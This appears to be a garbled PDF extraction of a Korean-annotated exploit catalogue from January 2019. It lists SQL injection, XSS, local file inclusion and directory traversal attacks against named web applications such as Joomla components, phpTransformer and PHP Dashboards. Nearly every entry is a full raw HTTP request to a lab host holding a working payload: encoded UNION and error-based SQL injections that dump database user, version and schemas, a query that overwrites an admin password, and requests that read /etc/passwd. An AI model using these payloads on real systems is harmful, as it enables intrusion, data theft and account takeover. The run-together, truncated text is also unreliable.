%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2d%2d%20%2d HTTP/1.1

Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate

Cookie: PHPSESSID=10ntro6maq17s705ip0e3a9je6DNT: 1


HealthNodeHospital

Management System

HealthNodeHospital

ManagementSystem 1.0

2019-01-14 46151 SQL Injection 하 하Real Estate Custom Script 2.0 -

SQL Injection

GET/10.0.100.24/index.php?route=property/property_detail&property_id=15912%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=b22e9305c86adea2c071bf2d1053725c;

default=78b0c7c7490c09d10765fb78b61bd9a3; language=en-gb;currency=USD; __zlcmid=qMhwOYHc5w0PnjDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Real Estate CustomScript

Real EstateCustom Script

2.0

2019-01-14 46152 SQL Injection 하 하Job Portal Platform 1.0 - SQL

Injection

POST/10.0.100.24/index.php?route=tmdblog/blog&blog_id=14%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45(22,%25%34%33%25%34%66%25%34%65%25%34%33%25%34%31%25%35%34%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1Host: TARGETUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate

Cookie: PHPSESSID=b22e9305c86adea2c071bf2d1053725c;default=78b0c7c7490c09d10765fb78b61bd9a3; language=en-gb;currency=USD; __zlcmid=qMhwOYHc5w0PnjDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Job PortalPlatform

Job PortalPlatform 1.0

2019-01-14 46154 SQL Injection 중 하

Bigcart - Ecommerce

Multivendor System 1.0 - SQL

Injection

GET/10.0.100.24/index.php?route=product/category&path=%33%33%5f%36%34%31%34%39%39%39%39%39%27%20%2f%2a%21%31%33%33%33%37%50%72%6f%63%65%44%75%72%65%2a%2f%20%41%6e%41%6c%79%73%65%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%63%6f%6e%63%61%74%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflateCookie: OCSESSID=19eef2415d8afbee8c2f353629; language=en-gb;currency=USDDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Bigcart -Ecommerce

Multivendor System

Bigcart -Ecommerce

MultivendorSystem 1.0

2019-01-15 46168 SQL Injection 하 하 ownDMS 4.7 - SQL Injection

GET/10.0.100.24/includes/pdfstream.php?IMG=%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35,0x48656c6c6f204861636b657220416269,%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2d%2d%20%2d HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate

Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

ownDMS ownDMS 4.7

2019-01-17 46187 XSS 하 하

Oracle Reports Developer

Component 12.2.1.3 - Cross-

site Scripting

GET/10.0.100.24/reports/rwservlet/showenv%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3EE HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0)Gecko/20100101 Firefox/63.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 101Connection: closeUpgrade-Insecure-Requests: 1

Oracle ReportsDeveloperComponent

OracleReportsDeveloperComponent12.2.1.3




2019-01-18 46190 LFI 중 하SeoToaster Ecommerce / CRM /

CMS 3.0.0 - Local File Inclusion

POST /10.0.100.24/backend/backend_theme/editcss/ HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 19Cookie: hideAdminPanel=0; currSectionOpen=0;PHPSESSID=0u6ftq75vn79fs3512mli59jo3;mwui=eyJhZG1pbnNpZGViYXJwaW4iOiJ0cnVlIn0%3D;back_to_admin=http%3A//localhost/ExploitDb/latest/admin/view%3AsettingsDNT: 1Connection: keep-alive

Upgrade-Insecure-Requests: 1getcss=../index.php: undefined

SeoToasterEcommerce

SeoToasterEcommerce /CRM / CMS3.0.0

2019-01-18 46191 SQL Injection 하 하phpTransformer 2016.9 - SQL

Injection

GET/10.0.100.24/Programs/news/GeneratePDF.php?Lang=English&idnews=20190000000%27%20%41%4e%44%20%53%4c%45%45%50%28%35%29%2d%2d%20%2dHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: TryLogin=0; PHPSESSID=2hsc4lr80e0lv14jorun0bs390;browserupdateorg=pause; phpwcmsBELang=en;phpwcmsBEItemsPerPage=25;Contemplate=visitor_ID%3DDzk7W2LkwvYjLr4j-20190117235156;phpTransformer=9th36daohkgnuoqm0mmck5her6;phpTransformerSetup=gtaavf8vg8t63s4qhg98q6pi22;

TawkConnectionTime=0;__tawkuuid=e::localhost::L/LRDuMLZaB4u3yegW9pKFQGnt3becl4U6WG0DrN27cIjyTFhHLpZf4VKwUqD3qh::2DNT: 1Connection: keep-alive

Upgrade-Insecure-Requests: 1

phpTransformerphpTransforme

r 2016.9

2019-01-18 46192 Directory Traversal 하 하phpTransformer 2016.9 -

Directory Traversal

GET/10.0.100.24/Programs/gallery/admin/jQueryFileUploadmaster/server/php/index.php?path=../../../../../../ HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=2hsc4lr80e0lv14jorun0bs390;browserupdateorg=pause; phpwcmsBELang=en;phpwcmsBEItemsPerPage=25;Contemplate=visitor_ID%3DDzk7W2LkwvYjLr4j-20190117235156;

phpTransformer=9th36daohkgnuoqm0mmck5her6;phpTransformerSetup=gtaavf8vg8t63s4qhg98q6pi22;TawkConnectionTime=0;__tawkuuid=e::localhost::L/LRDuMLZaB4u3yegW9pKFQGnt3becl4U6WG0DrN27cIjyTFhHLpZf4VKwUqD3qh::2DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

phpTransformerphpTransforme

r 2016.9

2019-01-18 46200 XSS 중 하

Joomla! Core 3.9.1 - Persistent

Cross-Site Scripting in Global

Configuration Textfilter Settings

POST /10.0.100.24/administrator/index.php?option=com_configHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer:http://<target_ip>/administrator/index.php?option=com_config

Content-Type: application/x-www-form-urlencodedContent-Length: 4303Connection: closeCookie: wp-settings-time-1=1540363679;05e3b315128406acf7dd996046a180f8=__SITE__;7bb05cf41807f1d0136fbae285e8a16c=1;783fff54c324d89891f303b51230c499=vnrnl8bo3u62d25ak8tqbruhs2Upgrade-Insecure-Requests: 1

jform%5Bsitename%5D=testjoomla&jform%5Boffline%5D=0&jform%5Bdisplay_offline_message%5D=1&jform%5Boffline_message%5D=This+site+is+down+for+maintenance.%3Cbr+%2F%3EPlease+check+back+again+soon.&jform%5Boffline_image%5D=&jform%5Bfrontediting%5D=1&jform%5Beditor%5D=tinymce&jform%5Bcaptcha%5D=0&jform%5Baccess%5D=1&jform%5Blist_limit%5D=20&jform%5Bfeed_limit%5D=10&jform%5Bfeed_email%5D=n

one&jform%

Joomla! CoreJoomla! Core

3.9.1

2019-01-18 46206 File Upload 하 상

Pydio / AjaXplorer < 5.0.4 -

Unauthenticated Arbitrary File

Upload

get_file&name=../../../../../../../../etc/passwd Pydio / AjaXplorerPydio /

AjaXplorer <

5.0.4

2019-01-21 46209 SQL Injection 하 하 Coman 1.0 - 'id' SQL Injection

GET /10.0.100.24/index.php/framework-crud-detailaction?crud=task&id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backTo=dashboard HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dcDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Coman Coman 1.0




2019-01-21 46210 SQL Injection 하 하 Reservic 1.0 - 'id' SQL Injection

GET /10.0.100.24/index.php/framework-crud-detailaction?crud=reserves&id=4+%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backTo=dashboard HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)

Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dcDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Reservic Reservic 1.0

2019-01-21 46211 SQL Injection 하 하MoneyFlux 1.0 - 'id' SQL

Injection

GET /10.0.100.24/index.php/framework-crud-updateaction?id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20AS+%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%6

8%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&crud=expense HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)

Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate

Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dcDNT: 1


MoneyFlux MoneyFlux 1.0

2019-01-21 46212 SQL Injection 하 하PHP Dashboards NEW 5.8 -

'dashID' SQL Injection

GET/10.0.100.24/php/save/savedescriptions.php?dashID=%2d%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35

%2c%36%2c%37%2c%38%2c%39%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%73%63%68%65%6d%61%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%53%43%48%45%4d%41%54%41%29%2c%31%31%2d%2d%20%2dHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

PHP Dashboards NEWPHP

DashboardsNEW 5.8

2019-01-21 46213 LFI 중 하PHP Dashboards NEW 5.8 -

Local File Inclusion

POST /10.0.100.24/php/file/read.php HTTP/1.1Host: 10.0.100.24:1004

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 37Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

filename=../../../../../../etc/passwd: undefined

PHP Dashboards NEWPHP

DashboardsNEW 5.8

2019-01-21 46214 SQL Injection 하 하PHP Uber-style GeoTracking 1.1

- SQL Injection

POST /10.0.100.24/php/profile/index.php HTTP/1.1Host: 10.0.100.24:1004

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 354DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

email=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2d%2d%20%2d: undefined

PHP Uber-styleGeoTracking

PHP Uber-style

GeoTracking1.1

2019-01-21 46217 SQL Injection 하 상Adianti Framework 5.5.0 - SQL

Injection

(SELECT 'hackeado'),login=(SELECT 'anonymous'),password=(SELECT'294de3557d9d00b3d2d8a1e6aab028cf'),email=(SELECT'[email protected]')WHERE `id`=1#

Adianti FrameworkAdiantiFramework5.5.0




2019-01-23 46223 SQL Injection 중 하Joomla! Component vBizz 1.0.7

- SQL Injection

POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 726Cookie:84c9f7083d1056c3a8f06ae659d3db0a=9t045qt6rjftqm53itf5uju310;joomla_user_state=logged_inDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

profile_pic=&name=test&username=test&password=&user_role=11&[email protected]&empid=1&department=5&designation=6&phone=&gender=1&blood_group=A%2B&dob=-1-11-30&present_address=&permanent_address=&joining_date=-1-11-30&work_type=permanent&payment_type=bank&pan=&pf_ac=0&bank_ac=0&bank_name=&bank_branch=&ifsc=&leaving_date=-1-11-30&amount[]=111.00&payid[]=7.....

Joomla! ComponentJoomla!Component

vBizz 1.0.7

2019-01-23 46225 SQL Injection 하 하Joomla! Component vWishlist


POST /10.0.100.24/ HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 372Cookie:1b9dcd66a46474552f38b0164f24ac07=738c74dd230a79b92e8bce29cfd435b

9; activeProfile=0; joomla_user_state=logged_in


option=com_vwishlist&task=wishlist&wishval=1&userid=711&numofQua

ntity=1&wishQuantshw=1&wishPriceshw=1&wishDatetimeshw=1&vproductid=48%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%3

2,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29

%29,%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58: undefined

Joomla! Component

Joomla!Component

vWishlist1.0.1

2019-01-23 46226 SQL Injection 하 하Joomla! Component vAccount

2.0.2 - 'vid' SQL Injection

GET /10.0.100.24/vaccount-dashboard/expense?vid=18%20%20%41%4e%44%20%45%58%54%52%41%43%54%

56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29,%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1Host: 10.0.100.24:1004

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie:39b5054fae6740372b1521628707bdc7=pusmhir0h1896vr6v5dvmnqd46DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Joomla! Component

Joomla!ComponentvAccount2.0.2

2019-01-23 46227 SQL Injection 중 하Joomla! Component vReview


POST /10.0.100.24/index.php?option=com_vreview&task=editReviewHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 210Cookie:1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526; activeProfile=709DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

cmId=%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c

%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d: undefined

Joomla! Component

Joomla!Component

vReview1.9.11


Joomla! Component

vRestaurant 1.9.4 - SQL

Injection

POST /10.0.100.24/menu-listing-layout/menuitems HTTP/1.1

Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 322Cookie:1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

csmodid=236&Itemid=303&keysearch=' union select(SELECT(@x)FROM(SELECT(@x: =0x00),(@NR

Joomla! Component

Joomla!Component

vRestaurant1.9.4




2019-01-23 46229 SQL Injection 하 하Joomla! Component VMap 1.9.6

- SQL Injection

GET/10.0.100.24/index.php?option=com_vmap&task=loadmarker&latlngbound=-40.716362432588596,40.71920853699145,-73.983044552948,-

73.972959447052%20%4f%72%64%65%72%20%62%79%20%31%32%2d%2d%20%2d&mapid=1 HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)

Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie:1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b

3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-

dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526

Joomla! ComponentJoomla!ComponentVMap 1.9.6


Joomla! Component J-

BusinessDirectory 4.9.7 - 'type'

SQL Injection

GET/10.0.100.24/index.php?option=com_jbusinessdirectory&task=categories.getCategories&type=1%20union%20select%20(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),2--%20-&term=a HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991;79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad6; PHPSESSID=c1088ee33a3f4770dd333f9605b9e44f;704a7cf3f453ec2db97de2f28ef169f8=fb9a121113ff0e6cc6da546a82f2452e

DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1Cache-Control: max-age=0

Joomla! Component

Joomla!Component J-BusinessDirectory 4.9.7



ClassifiedsManager 3.0.5 - SQL

Injection

POST /10.0.100.24/component/jclassifiedsmanager/ HTTP/1.1

Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)


text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 779

Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991;79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad

6DNT: 1


searchKeyword=&categorySearch=&adType=&citySearch=1'%7c%7c%28%53%45%4c%45%43%54%20%27%45%66%65%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%452%3d%32%20%41%4e%44%20%28%53%45%4c%45%43%54%20%32%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29,%56%45%52%53%49%4f%4e%....59%20%78%29%61%29%29%7c%7c%27&option=com_jclassifiedsmanager&controller=displayads&task=searchAds&view=displayads

Joomla! Component

Joomla!

Component J-ClassifiedsMa

nager 3.0.5


Joomla! Component

JMultipleHotelReservation 6.0.7

- SQL Injection

POST /10.0.100.24/j-myhotel/search-hotels?view=hotels HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:

